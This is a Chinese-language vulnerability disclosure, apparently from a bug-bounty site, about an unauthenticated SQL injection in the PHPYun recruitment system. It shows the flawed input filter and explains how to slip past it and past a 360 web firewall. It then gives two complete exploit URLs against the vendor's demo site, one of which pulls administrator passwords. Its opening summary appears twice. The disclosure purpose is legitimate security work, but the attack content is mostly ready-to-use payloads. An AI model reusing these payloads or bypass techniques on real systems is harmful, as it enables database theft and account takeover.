### 简要描述: PHP云人才系统最新版1处SQL注入(union select),无需登陆,可取任意数据。 官网demo测试。 ### 详细说明: 最新版全局过滤函数修改:config/db.safety.php ``` 27 function gpc2sql($str,$str2) { 28 29 if(preg_match("/select|insert|update|delete|union|load_file|outfile/is", $str)) 30 { 31 exit(safe_pape()); 32 } 33 34 if(preg_match("/select|insert|update|delete|union|load_file|outfile/is", $str2)) 35 { 36 exit(safe_pape()); 37 } 38 39 40 $arr=array("sleep"=>"��leep"," and "=>" an d "," or "=>" ��r ","%20"=>" ","select"=>"��elect","update"=>"��pdate","count"=>"��ount","chr"=>"��hr","truncate"=>"��runcate","union"=>"��nion","delete"=>"��elete","insert"=>"��nsert","<"=>"<",">"=>">","\""=>""","'"=>"´","--"=>"- -","\("=>"��","\)"=>"��","00000000"=>""); 41 42 foreach($arr as $key=>$v){ 43 $str = preg_replace('/'.$key.'/isU',$v,$str); 44 } 45 return $str; 46 } ``` 里面把"00000000"直接过滤为了"", 为UNION注入提供了方法。 UNION select写成UNI00000000ON%20sel00000000ect就没问题了,经过gpc2sql后,就又变成了UNION select。 UNI00000000ON%20se00000000lect =>...
### 简要描述: PHP云人才系统最新版1处SQL注入(union select),无需登陆,可取任意数据。 官网demo测试。 ### 详细说明: 最新版全局过滤函数修改:config/db.safety.php ``` 27 function gpc2sql($str,$str2) { 28 29 if(preg_match("/select|insert|update|delete|union|load_file|outfile/is", $str)) 30 { 31 exit(safe_pape()); 32 } 33 34 if(preg_match("/select|insert|update|delete|union|load_file|outfile/is", $str2)) 35 { 36 exit(safe_pape()); 37 } 38 39 40 $arr=array("sleep"=>"��leep"," and "=>" an d "," or "=>" ��r ","%20"=>" ","select"=>"��elect","update"=>"��pdate","count"=>"��ount","chr"=>"��hr","truncate"=>"��runcate","union"=>"��nion","delete"=>"��elete","insert"=>"��nsert","<"=>"<",">"=>">","\""=>""","'"=>"´","--"=>"- -","\("=>"��","\)"=>"��","00000000"=>""); 41 42 foreach($arr as $key=>$v){ 43 $str = preg_replace('/'.$key.'/isU',$v,$str); 44 } 45 return $str; 46 } ``` 里面把"00000000"直接过滤为了"", 为UNION注入提供了方法。 UNION select写成UNI00000000ON%20sel00000000ect就没问题了,经过gpc2sql后,就又变成了UNION select。 UNI00000000ON%20se00000000lect => gpc2sql => UNION select 剩下的就是绕过safesql()的check,和360的check。 对于safesql,check 'union select'的正则表达式为"UNION.+?SELECT(\\\\(.+\\\\)|\\\\s+?.+?)", 那么用"UNION SELECT%23%0a"就能绕过。 对以360的check则更容易,例如URL为:'wap/index.php', 则访问'wap/index.php/admin.php'即可绕过。 好了,我们先通过一处SQL注入尝试UNION,构造的URL为: ``` http://www.hr135.com/wap/index.php/admin.php?c=job&pr=-1%20UNI00000000ON%20sel00000000ect%23%0a0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%23&hy=%0a,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%23&num=&exp=&edu=&type=&uptime= ``` 直接出UNION SELECT的数据。 [<img src="https://images.seebug.org/upload/201506/29201226eb68e7bcccdceab0e317e3412890e97e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/29201226eb68e7bcccdceab0e317e3412890e97e.png) 构造URL直接取管理员密码: ``` http://www.hr135.com/wap/index.php/admin.php?c=job&pr=-1%20UNI00000000ON%20sel00000000ect%23%0apassword,1,password,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%23&hy=%0a,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%23&num=&exp=&edu=%0a%20fro00000000m%20phpyun_admin_user%20limit%201%23&type=&uptime= ``` [<img src="https://images.seebug.org/upload/201506/2920123755cc24d5faee8f944f4aa068fd6a5d5d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/2920123755cc24d5faee8f944f4aa068fd6a5d5d.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201506/29201226eb68e7bcccdceab0e317e3412890e97e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/29201226eb68e7bcccdceab0e317e3412890e97e.png) [<img src="https://images.seebug.org/upload/201506/2920123755cc24d5faee8f944f4aa068fd6a5d5d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/2920123755cc24d5faee8f944f4aa068fd6a5d5d.png)
